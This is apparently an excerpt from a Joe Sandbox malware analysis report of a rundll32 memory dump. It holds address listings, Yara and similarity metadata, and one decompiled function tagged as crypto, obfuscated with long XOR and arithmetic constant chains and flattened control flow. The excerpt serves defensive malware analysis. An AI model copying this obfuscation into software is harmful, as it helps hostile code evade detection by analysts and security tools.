                                                                                                                    0x0033c957
                                                                                                                    0x0033c957
                                                                                                                    0x0033c95d
                                                                                                                    0x00000000
                                                                                                                    0x0033c963
                                                                                                                    0x0033c97c
                                                                                                                    0x0033c995
                                                                                                                    0x0033c99c
                                                                                                                    0x0033c9ab
                                                                                                                    0x0033c9ad
                                                                                                                    0x0033c9b2
                                                                                                                    0x0033c9b7
                                                                                                                    0x00000000
                                                                                                                    0x0033c9b7
                                                                                                                    0x0033c95d
                                                                                                                    0x0033c955
                                                                                                                    0x0033c94d
                                                                                                                    0x0033c941
                                                                                                                    0x00000000
                                                                                                                    0x0033ca4d
                                                                                                                    0x0033ca4d
                                                                                                                    0x00000000
                                                                                                                    0x0033ca59
                                                                                                                    0x0033c647
                                                                                                                    0x0033c642

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                    • API String ID: 0-258179307
                                                                                                                    • Opcode ID: 62b3f826b71934d39e268c39c84f5b23f5f0a56fbe245a61988d9f0264baf4a3
                                                                                                                    • Instruction ID: 0c87e68ef2b9a7ad8d1ea861ba8e7e37c72b35f7285ea13de861e3df1f925616
                                                                                                                    • Opcode Fuzzy Hash: 62b3f826b71934d39e268c39c84f5b23f5f0a56fbe245a61988d9f0264baf4a3
                                                                                                                    • Instruction Fuzzy Hash: 4D72F171509381DFD379CF25C58AA9BBBE2BBC4304F10891DE6DA9A260D7B18949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00344B87 Relevance: 21.9, Strings: 17, Instructions: 604COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00344B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
				_v2700 = 0xc3e9b4;
				_v2700 = _v2700 ^ 0x7e7d7a5b;
				_v2700 = _v2700 ^ 0x7ebc2479;
				_v2684 = 0x348655;
				_v2684 = _v2684 + 0xffff5240;
				_v2684 = _v2684 ^ 0x0038d539;
				_v2836 = 0xc8c90d;
				_v2836 = _v2836 | 0x6050777e;
				_v2836 = _v2836 + 0xfffffb37;
				_v2836 = _v2836 << 0xe;
				_v2836 = _v2836 ^ 0x3ea8df0c;
				_v2664 = 0x4ea234;
				_v2664 = _v2664 ^ 0x152f142f;
				_v2664 = _v2664 ^ 0x1568dd81;
				_v2900 = 0xa78742;
				_v2900 = _v2900 * 0x70;
				_v2900 = _v2900 + 0x89c7;
				_v2900 = _v2900 * 0x26;
				_v2900 = _v2900 ^ 0xe13351a3;
				_v2752 = 0x43c729;
				_v2752 = _v2752 * 9;
				_v2752 = _v2752 >> 0xc;
				_v2752 = _v2752 ^ 0x0004a0a7;
				_v2656 = 0x163ba0;
				_v2656 = _v2656 | 0x3b2cca0a;
				_v2656 = _v2656 ^ 0x3b3c61f3;
				_v2800 = 0x539f85;
				_v2800 = _v2800 + 0xffff9927;
				_v2800 = _v2800 >> 0xd;
				_v2800 = _v2800 ^ 0x000ca278;
				_v2892 = 0xaa9f70;
				_v2892 = _v2892 | 0xffd04745;
				_t740 = 0x33;
				_v2892 = _v2892 * 0x48;
				_v2892 = _v2892 + 0xabed;
				_v2892 = _v2892 ^ 0xfe85b4b6;
				_v2728 = 0x66b1f8;
				_v2728 = _v2728 + 0xffffb85a;
				_v2728 = _v2728 + 0xffff17c5;
				_v2728 = _v2728 ^ 0x00666892;
				_v2792 = 0x34b823;
				_v2792 = _v2792 + 0x705f;
				_v2792 = _v2792 | 0x13d147dd;
				_v2792 = _v2792 ^ 0x13fd2081;
				_v2884 = 0x7f5269;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 + 0xdf59;
				_v2884 = _v2884 ^ 0x086ba2e3;
				_v2884 = _v2884 ^ 0x086346ed;
				_v2784 = 0x4150c;
				_v2784 = _v2784 ^ 0xadfae27c;
				_v2784 = _v2784 << 0xf;
				_v2784 = _v2784 ^ 0x7bb89155;
				_v2860 = 0x3ff4f9;
				_v2860 = _v2860 + 0x97ef;
				_v2860 = _v2860 ^ 0x8a52113e;
				_v2860 = _v2860 * 0x3b;
				_v2860 = _v2860 ^ 0xd244680a;
				_v2920 = 0xf20633;
				_v2920 = _v2920 >> 0xa;
				_v2920 = _v2920 << 6;
				_v2920 = _v2920 | 0x86ded8f3;
				_v2920 = _v2920 ^ 0x86d0715a;
				_v2676 = 0xbc4416;
				_v2676 = _v2676 + 0x253a;
				_v2676 = _v2676 ^ 0x00bded5f;
				_v2928 = 0x15fa7c;
				_v2928 = _v2928 >> 1;
				_v2928 = _v2928 * 0x6e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x00445a38;
				_v2844 = 0xaff44e;
				_v2844 = _v2844 * 0x28;
				_v2844 = _v2844 ^ 0x281c7ad4;
				_v2844 = _v2844 * 0xe;
				_v2844 = _v2844 ^ 0xcf625ac8;
				_v2744 = 0x5c05ba;
				_v2744 = _v2744 << 1;
				_v2744 = _v2744 ^ 0x54918a83;
				_v2744 = _v2744 ^ 0x542c1472;
				_v2904 = 0xa399f4;
				_v2904 = _v2904 / _t740;
				_t741 = 9;
				_v2904 = _v2904 / _t741;
				_v2904 = _v2904 >> 0xb;
				_v2904 = _v2904 ^ 0x000d27e7;
				_v2912 = 0xbe4d5b;
				_v2912 = _v2912 << 2;
				_v2912 = _v2912 >> 8;
				_v2912 = _v2912 + 0xbc5;
				_v2912 = _v2912 ^ 0x000f01bd;
				_v2888 = 0xb7f9c;
				_v2888 = _v2888 ^ 0x23a090a0;
				_v2888 = _v2888 + 0xffffcb65;
				_v2888 = _v2888 + 0xffffb53f;
				_v2888 = _v2888 ^ 0x23a896a2;
				_v2776 = 0xcbb323;
				_v2776 = _v2776 + 0x81c3;
				_v2776 = _v2776 >> 1;
				_v2776 = _v2776 ^ 0x00676393;
				_v2648 = 0x271f91;
				_v2648 = _v2648 + 0xffff9397;
				_v2648 = _v2648 ^ 0x0029f035;
				_v2896 = 0x78618c;
				_v2896 = _v2896 << 0xc;
				_v2896 = _v2896 ^ 0x0a821cde;
				_v2896 = _v2896 + 0xb475;
				_v2896 = _v2896 ^ 0x8c94da80;
				_v2720 = 0xacdc2a;
				_v2720 = _v2720 | 0x57611697;
				_v2720 = _v2720 ^ 0xc01b1ef4;
				_v2720 = _v2720 ^ 0x97fc8dfe;
				_v2668 = 0x55603e;
				_v2668 = _v2668 >> 1;
				_v2668 = _v2668 ^ 0x002dad1d;
				_v2828 = 0xf126f6;
				_t742 = 0x29;
				_v2828 = _v2828 * 0x43;
				_v2828 = _v2828 + 0x8cbb;
				_v2828 = _v2828 ^ 0x3f126f56;
				_v2768 = 0x9c087b;
				_v2768 = _v2768 << 9;
				_v2768 = _v2768 + 0xffffe171;
				_v2768 = _v2768 ^ 0x3813f585;
				_v2880 = 0xb815a3;
				_v2880 = _v2880 ^ 0x72879ea7;
				_v2880 = _v2880 / _t742;
				_v2880 = _v2880 + 0xc3b;
				_v2880 = _v2880 ^ 0x02c00b8a;
				_v2872 = 0xffe9a8;
				_v2872 = _v2872 | 0x05f4b9e7;
				_v2872 = _v2872 + 0xffff2424;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0xff8a2c7e;
				_v2808 = 0x17a98a;
				_t743 = 0x6a;
				_v2808 = _v2808 * 0x35;
				_v2808 = _v2808 + 0x8a0b;
				_v2808 = _v2808 ^ 0x04e27d5d;
				_v2644 = 0x3aca8c;
				_v2644 = _v2644 | 0x1dba2023;
				_v2644 = _v2644 ^ 0x1dba33fd;
				_v2760 = 0xa9a4ba;
				_v2760 = _v2760 ^ 0x6721c4f3;
				_v2760 = _v2760 + 0xffff7b43;
				_v2760 = _v2760 ^ 0x6786e634;
				_v2660 = 0xef5940;
				_t327 =  &_v2660; // 0xef5940
				_v2660 =  *_t327 / _t743;
				_v2660 = _v2660 ^ 0x0008b7a5;
				_v2640 = 0x8c91f9;
				_v2640 = _v2640 + 0x2aa0;
				_v2640 = _v2640 ^ 0x008fd6f1;
				_v2716 = 0xebae10;
				_v2716 = _v2716 + 0x2e93;
				_v2716 = _v2716 >> 3;
				_v2716 = _v2716 ^ 0x0012b27f;
				_v2692 = 0xf4ef17;
				_v2692 = _v2692 ^ 0x14a8ca79;
				_v2692 = _v2692 ^ 0x145940a6;
				_v2712 = 0x90da21;
				_v2712 = _v2712 * 0x5c;
				_v2712 = _v2712 << 6;
				_v2712 = _v2712 ^ 0x039c340b;
				_v2812 = 0x599c06;
				_v2812 = _v2812 | 0x7b64813d;
				_v2812 = _v2812 * 0x3e;
				_v2812 = _v2812 ^ 0xe8633365;
				_v2748 = 0x57b46;
				_t744 = 0x38;
				_v2748 = _v2748 / _t744;
				_v2748 = _v2748 + 0xffffe4a2;
				_v2748 = _v2748 ^ 0xffff7983;
				_v2856 = 0xb347e1;
				_v2856 = _v2856 << 0xf;
				_v2856 = _v2856 + 0xc3e6;
				_v2856 = _v2856 ^ 0xcd6ff0ef;
				_v2856 = _v2856 ^ 0x6e991901;
				_v2756 = 0x3d21e7;
				_v2756 = _v2756 + 0x4052;
				_v2756 = _v2756 + 0xfab6;
				_v2756 = _v2756 ^ 0x0033d413;
				_v2680 = 0xeea097;
				_v2680 = _v2680 * 0x29;
				_v2680 = _v2680 ^ 0x26367c85;
				_v2852 = 0x9a84c7;
				_v2852 = _v2852 << 4;
				_v2852 = _v2852 + 0x5305;
				_v2852 = _v2852 * 0x47;
				_v2852 = _v2852 ^ 0xadc8f5b7;
				_v2736 = 0x1d92c0;
				_v2736 = _v2736 ^ 0x4e3febcd;
				_v2736 = _v2736 ^ 0x2a5eeaad;
				_v2736 = _v2736 ^ 0x647637b5;
				_v2916 = 0x7a6f6e;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x74549758;
				_v2916 = _v2916 * 0x5e;
				_v2916 = _v2916 ^ 0x014df6ca;
				_v2820 = 0x88f64;
				_v2820 = _v2820 << 0xb;
				_v2820 = _v2820 ^ 0x8d7f89a1;
				_v2820 = _v2820 ^ 0xc90720e1;
				_v2672 = 0x9d7b6a;
				_v2672 = _v2672 * 0x74;
				_v2672 = _v2672 ^ 0x47521deb;
				_v2868 = 0x2a980b;
				_v2868 = _v2868 << 2;
				_v2868 = _v2868 * 0x37;
				_v2868 = _v2868 * 0x45;
				_v2868 = _v2868 ^ 0xdda58f8d;
				_v2704 = 0xd94882;
				_v2704 = _v2704 >> 7;
				_v2704 = _v2704 ^ 0x000dd1c5;
				_v2908 = 0x8685cf;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 + 0x478f;
				_v2908 = _v2908 | 0x9a4acbdf;
				_v2908 = _v2908 ^ 0x9a416c75;
				_v2724 = 0x3983d7;
				_v2724 = _v2724 ^ 0xaf8ece10;
				_v2724 = _v2724 + 0xfffffe8c;
				_v2724 = _v2724 ^ 0xafb9f002;
				_v2652 = 0xb48fd9;
				_v2652 = _v2652 >> 7;
				_v2652 = _v2652 ^ 0x0003170e;
				_v2732 = 0x26e706;
				_v2732 = _v2732 + 0xffff7cb3;
				_v2732 = _v2732 << 7;
				_v2732 = _v2732 ^ 0x13307998;
				_v2840 = 0xdaf489;
				_v2840 = _v2840 ^ 0x20b9ad9c;
				_v2840 = _v2840 + 0xa5fa;
				_v2840 = _v2840 ^ 0x206e4944;
				_v2848 = 0x15799;
				_v2848 = _v2848 + 0xffffbd76;
				_v2848 = _v2848 | 0x84cc3dff;
				_v2848 = _v2848 ^ 0x84c4ee28;
				_v2740 = 0x344f78;
				_v2740 = _v2740 | 0xed30b44e;
				_v2740 = _v2740 + 0x582d;
				_v2740 = _v2740 ^ 0xed3a4892;
				_v2764 = 0x3aec11;
				_t745 = 0x14;
				_v2764 = _v2764 * 0x24;
				_v2764 = _v2764 * 0xd;
				_v2764 = _v2764 ^ 0x6bb19aaa;
				_v2772 = 0xa2a4e3;
				_v2772 = _v2772 * 0x54;
				_v2772 = _v2772 + 0xd74c;
				_v2772 = _v2772 ^ 0x35517ae7;
				_v2780 = 0xc7cad3;
				_v2780 = _v2780 ^ 0xe16f0727;
				_v2780 = _v2780 + 0xa55f;
				_v2780 = _v2780 ^ 0xe1ad612a;
				_v2788 = 0x30bac2;
				_v2788 = _v2788 << 2;
				_v2788 = _v2788 * 0x19;
				_v2788 = _v2788 ^ 0x130f6af8;
				_v2708 = 0x5b81b7;
				_v2708 = _v2708 << 0xd;
				_v2708 = _v2708 ^ 0x7032fecb;
				_v2816 = 0xe0b39a;
				_v2816 = _v2816 + 0xf3c;
				_v2816 = _v2816 * 0x29;
				_v2816 = _v2816 ^ 0x23fa5b32;
				_v2832 = 0xb37143;
				_v2832 = _v2832 + 0xffff99de;
				_v2832 = _v2832 / _t745;
				_v2832 = _v2832 | 0xcb90c15e;
				_v2832 = _v2832 ^ 0xcb9cb56b;
				_v2824 = 0xf7e429;
				_v2824 = _v2824 << 0x10;
				_v2824 = _v2824 ^ 0x4b169193;
				_v2824 = _v2824 ^ 0xaf30b470;
				_t703 = E00347CDB(_t745);
				_t797 = _v2708;
				_t736 = _t703;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t811 = _t798 - 0xa06a9d5;
							if(_t811 <= 0) {
								break;
							}
							__eflags = _t798 - 0xae01df1;
							if(__eflags == 0) {
								_push(_v2740);
								_push(0);
								_push(_t745);
								_push(1);
								_push(0);
								_push(_v2848);
								_t745 = _v2732;
								_push( &_v524);
								E0033AB87(_t745, _v2840, __eflags);
								_t804 = _t804 + 0x1c;
								_t798 = 0xfe27958;
								_t707 = 0x8a3cf08;
								goto L24;
							} else {
								__eflags = _t798 - 0xb104717;
								if(_t798 == 0xb104717) {
									_t745 = _v2748;
									_t708 = E00334816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
									_t797 = _t708;
									_t804 = _t804 + 0x10;
									__eflags = _t708;
									_t707 = 0x8a3cf08;
									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
									continue;
								} else {
									__eflags = _t798 - 0xe3ea8aa;
									if(_t798 == 0xe3ea8aa) {
										return E00341E67(_v2708, _v2816, _v2832, _v2824, _v2628);
									}
									__eflags = _t798 - 0xfe27958;
									if(_t798 != 0xfe27958) {
										goto L24;
									} else {
										E00348519(_v2764, _v2772, _t797);
										_pop(_t745);
										_t798 = 0xa06a9d5;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
							L27:
							return _t717;
						}
						if(_t811 == 0) {
							E00348519(_v2780, _v2788, _v2636);
							_pop(_t745);
							_t798 = 0xe3ea8aa;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0xce4571) {
							_push(_v2700);
							_push(_v2696);
							_push(_v2688);
							_t745 = _v2796;
							_push( &_v1044);
							E003446BB(_t745, _v2864);
							_t804 = _t804 - 0xc + 0x1c;
							_t798 = 0x2f0d176;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0x277711d) {
							_v2624 = E003359E9();
							_v2620 = 2 + E0033CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
							_t745 =  &_v2628;
							_t717 = E00348727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
							_t804 = _t804 + 0x38;
							__eflags = _t717;
							if(__eflags != 0) {
								_t798 = 0x47e8611;
								goto L1;
							}
						} else {
							if(_t798 == 0x2f0d176) {
								E0034DA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
								 *((short*)(E0033B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
								E00338969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
								_push(_v2860);
								_push(_v2784);
								E003347CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E0034DCF7(_v2884, 0x331308, __eflags),  &_v1564, _v2844, _v2744);
								E0033A8B0(_v2904, _t722, _v2912);
								_t745 = _v2888;
								_t717 = E0033EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
								_t804 = _t804 + 0x5c;
								__eflags = _t717;
								if(__eflags != 0) {
									_t798 = 0x277711d;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t798 == 0x47e8611) {
									_t745 =  &_v2636;
									E0034DEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
									_t804 = _t804 + 0x10;
									asm("sbb esi, esi");
									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t816 = _t798 - _t707;
									if(_t798 != _t707) {
										goto L24;
									} else {
										_push(_v2916);
										_push(_v2736);
										_t730 = E0034DCF7(_v2852, 0x3313f8, _t816);
										_pop(_t758);
										E0034453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
										_t804 = _t804 + 0x24;
										E0033A8B0(_v2724, _t730, _v2652);
										_pop(_t745);
										_t798 = 0xae01df1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t798 - 0xe39a6fa;
					} while (__eflags != 0);
					return _t707;
				}
			}












































































































                                                                                                                    0x00344b8d
                                                                                                                    0x00344b97
                                                                                                                    0x00344ba2
                                                                                                                    0x00344bad
                                                                                                                    0x00344bb8
                                                                                                                    0x00344bc3
                                                                                                                    0x00344bce
                                                                                                                    0x00344bd9
                                                                                                                    0x00344be1
                                                                                                                    0x00344bec
                                                                                                                    0x00344bf7
                                                                                                                    0x00344bff
                                                                                                                    0x00344c04
                                                                                                                    0x00344c09
                                                                                                                    0x00344c11
                                                                                                                    0x00344c19
                                                                                                                    0x00344c21
                                                                                                                    0x00344c33
                                                                                                                    0x00344c35
                                                                                                                    0x00344c3a
                                                                                                                    0x00344c3f
                                                                                                                    0x00344c45
                                                                                                                    0x00344c4d
                                                                                                                    0x00344c55
                                                                                                                    0x00344c60
                                                                                                                    0x00344c68
                                                                                                                    0x00344c73
                                                                                                                    0x00344c7e
                                                                                                                    0x00344c8b
                                                                                                                    0x00344c8c
                                                                                                                    0x00344c96
                                                                                                                    0x00344c9a
                                                                                                                    0x00344c9f
                                                                                                                    0x00344ca7
                                                                                                                    0x00344cb2
                                                                                                                    0x00344cba
                                                                                                                    0x00344cc5
                                                                                                                    0x00344cd0
                                                                                                                    0x00344cdb
                                                                                                                    0x00344ce6
                                                                                                                    0x00344cf1
                                                                                                                    0x00344cfc
                                                                                                                    0x00344d07
                                                                                                                    0x00344d0f
                                                                                                                    0x00344d17
                                                                                                                    0x00344d1f
                                                                                                                    0x00344d24
                                                                                                                    0x00344d2c
                                                                                                                    0x00344d37
                                                                                                                    0x00344d42
                                                                                                                    0x00344d4d
                                                                                                                    0x00344d5a
                                                                                                                    0x00344d5e
                                                                                                                    0x00344d6b
                                                                                                                    0x00344d6f
                                                                                                                    0x00344d77
                                                                                                                    0x00344d8a
                                                                                                                    0x00344d91
                                                                                                                    0x00344d99
                                                                                                                    0x00344da4
                                                                                                                    0x00344daf
                                                                                                                    0x00344dba
                                                                                                                    0x00344dc5
                                                                                                                    0x00344dd0
                                                                                                                    0x00344ddb
                                                                                                                    0x00344de3
                                                                                                                    0x00344df0
                                                                                                                    0x00344df8
                                                                                                                    0x00344e07
                                                                                                                    0x00344e0a
                                                                                                                    0x00344e0e
                                                                                                                    0x00344e16
                                                                                                                    0x00344e1e
                                                                                                                    0x00344e29
                                                                                                                    0x00344e34
                                                                                                                    0x00344e3f
                                                                                                                    0x00344e4a
                                                                                                                    0x00344e55
                                                                                                                    0x00344e60
                                                                                                                    0x00344e6b
                                                                                                                    0x00344e76
                                                                                                                    0x00344e7e
                                                                                                                    0x00344e83
                                                                                                                    0x00344e8b
                                                                                                                    0x00344e93
                                                                                                                    0x00344e9b
                                                                                                                    0x00344ea6
                                                                                                                    0x00344eb1
                                                                                                                    0x00344eb9
                                                                                                                    0x00344ec4
                                                                                                                    0x00344ecc
                                                                                                                    0x00344ed4
                                                                                                                    0x00344ee1
                                                                                                                    0x00344ee5
                                                                                                                    0x00344eed
                                                                                                                    0x00344ef5
                                                                                                                    0x00344efa
                                                                                                                    0x00344eff
                                                                                                                    0x00344f07
                                                                                                                    0x00344f0f
                                                                                                                    0x00344f1a
                                                                                                                    0x00344f25
                                                                                                                    0x00344f30
                                                                                                                    0x00344f38
                                                                                                                    0x00344f41
                                                                                                                    0x00344f45
                                                                                                                    0x00344f4a
                                                                                                                    0x00344f52
                                                                                                                    0x00344f5f
                                                                                                                    0x00344f63
                                                                                                                    0x00344f70
                                                                                                                    0x00344f74
                                                                                                                    0x00344f7c
                                                                                                                    0x00344f87
                                                                                                                    0x00344f8e
                                                                                                                    0x00344f99
                                                                                                                    0x00344fa4
                                                                                                                    0x00344fb4
                                                                                                                    0x00344fbc
                                                                                                                    0x00344fbf
                                                                                                                    0x00344fc3
                                                                                                                    0x00344fc8
                                                                                                                    0x00344fd0
                                                                                                                    0x00344fd8
                                                                                                                    0x00344fdd
                                                                                                                    0x00344fe2
                                                                                                                    0x00344fea
                                                                                                                    0x00344ff2
                                                                                                                    0x00344ffa
                                                                                                                    0x00345002
                                                                                                                    0x0034500a
                                                                                                                    0x00345012
                                                                                                                    0x0034501a
                                                                                                                    0x00345025
                                                                                                                    0x00345032
                                                                                                                    0x00345039
                                                                                                                    0x00345044
                                                                                                                    0x0034504f
                                                                                                                    0x0034505a
                                                                                                                    0x00345065
                                                                                                                    0x0034506d
                                                                                                                    0x00345072
                                                                                                                    0x0034507a
                                                                                                                    0x00345082
                                                                                                                    0x0034508a
                                                                                                                    0x00345095
                                                                                                                    0x003450a0
                                                                                                                    0x003450ab
                                                                                                                    0x003450b6
                                                                                                                    0x003450c1
                                                                                                                    0x003450c8
                                                                                                                    0x003450d3
                                                                                                                    0x003450e2
                                                                                                                    0x003450e5
                                                                                                                    0x003450e9
                                                                                                                    0x003450f1
                                                                                                                    0x003450f9
                                                                                                                    0x00345104
                                                                                                                    0x0034510c
                                                                                                                    0x00345117
                                                                                                                    0x00345122
                                                                                                                    0x0034512a
                                                                                                                    0x0034513a
                                                                                                                    0x0034513e
                                                                                                                    0x00345146
                                                                                                                    0x0034514e
                                                                                                                    0x00345156
                                                                                                                    0x0034515e
                                                                                                                    0x00345166
                                                                                                                    0x0034516b
                                                                                                                    0x00345173
                                                                                                                    0x00345186
                                                                                                                    0x00345187
                                                                                                                    0x0034518e
                                                                                                                    0x00345199
                                                                                                                    0x003451a4
                                                                                                                    0x003451af
                                                                                                                    0x003451ba
                                                                                                                    0x003451c5
                                                                                                                    0x003451d0
                                                                                                                    0x003451db
                                                                                                                    0x003451e6
                                                                                                                    0x003451f1
                                                                                                                    0x003451fc
                                                                                                                    0x00345205
                                                                                                                    0x0034520c
                                                                                                                    0x00345217
                                                                                                                    0x00345222
                                                                                                                    0x0034522d
                                                                                                                    0x00345238
                                                                                                                    0x00345243
                                                                                                                    0x0034524e
                                                                                                                    0x00345256
                                                                                                                    0x00345261
                                                                                                                    0x0034526c
                                                                                                                    0x00345277
                                                                                                                    0x00345282
                                                                                                                    0x00345295
                                                                                                                    0x0034529c
                                                                                                                    0x003452a4
                                                                                                                    0x003452af
                                                                                                                    0x003452ba
                                                                                                                    0x003452cd
                                                                                                                    0x003452d4
                                                                                                                    0x003452e1
                                                                                                                    0x003452f5
                                                                                                                    0x003452f8
                                                                                                                    0x003452ff
                                                                                                                    0x0034530a
                                                                                                                    0x00345315
                                                                                                                    0x0034531d
                                                                                                                    0x00345322
                                                                                                                    0x0034532a
                                                                                                                    0x00345332
                                                                                                                    0x0034533a
                                                                                                                    0x00345345
                                                                                                                    0x00345350
                                                                                                                    0x0034535b
                                                                                                                    0x00345366
                                                                                                                    0x00345379
                                                                                                                    0x00345380
                                                                                                                    0x0034538b
                                                                                                                    0x00345393
                                                                                                                    0x00345398
                                                                                                                    0x003453a5
                                                                                                                    0x003453a9
                                                                                                                    0x003453b1
                                                                                                                    0x003453bc
                                                                                                                    0x003453c7
                                                                                                                    0x003453d2
                                                                                                                    0x003453dd
                                                                                                                    0x003453e5
                                                                                                                    0x003453ea
                                                                                                                    0x003453f7
                                                                                                                    0x003453fb
                                                                                                                    0x00345403
                                                                                                                    0x0034540e
                                                                                                                    0x00345416
                                                                                                                    0x00345421
                                                                                                                    0x0034542c
                                                                                                                    0x0034543f
                                                                                                                    0x00345446
                                                                                                                    0x00345451
                                                                                                                    0x00345459
                                                                                                                    0x00345463
                                                                                                                    0x0034546c
                                                                                                                    0x00345470
                                                                                                                    0x00345478
                                                                                                                    0x00345483
                                                                                                                    0x0034548b
                                                                                                                    0x00345496
                                                                                                                    0x0034549e
                                                                                                                    0x003454a3
                                                                                                                    0x003454ab
                                                                                                                    0x003454b3
                                                                                                                    0x003454bb
                                                                                                                    0x003454c6
                                                                                                                    0x003454d1
                                                                                                                    0x003454dc
                                                                                                                    0x003454e7
                                                                                                                    0x003454f2
                                                                                                                    0x003454fa
                                                                                                                    0x00345505
                                                                                                                    0x00345510
                                                                                                                    0x0034551b
                                                                                                                    0x00345523
                                                                                                                    0x0034552e
                                                                                                                    0x0034553e
                                                                                                                    0x00345546
                                                                                                                    0x0034554e
                                                                                                                    0x00345556
                                                                                                                    0x00345568
                                                                                                                    0x00345570
                                                                                                                    0x00345578
                                                                                                                    0x00345580
                                                                                                                    0x0034558b
                                                                                                                    0x00345596
                                                                                                                    0x003455a1
                                                                                                                    0x003455ac
                                                                                                                    0x003455c1
                                                                                                                    0x003455c2
                                                                                                                    0x003455d1
                                                                                                                    0x003455d8
                                                                                                                    0x003455e3
                                                                                                                    0x003455f6
                                                                                                                    0x003455fd
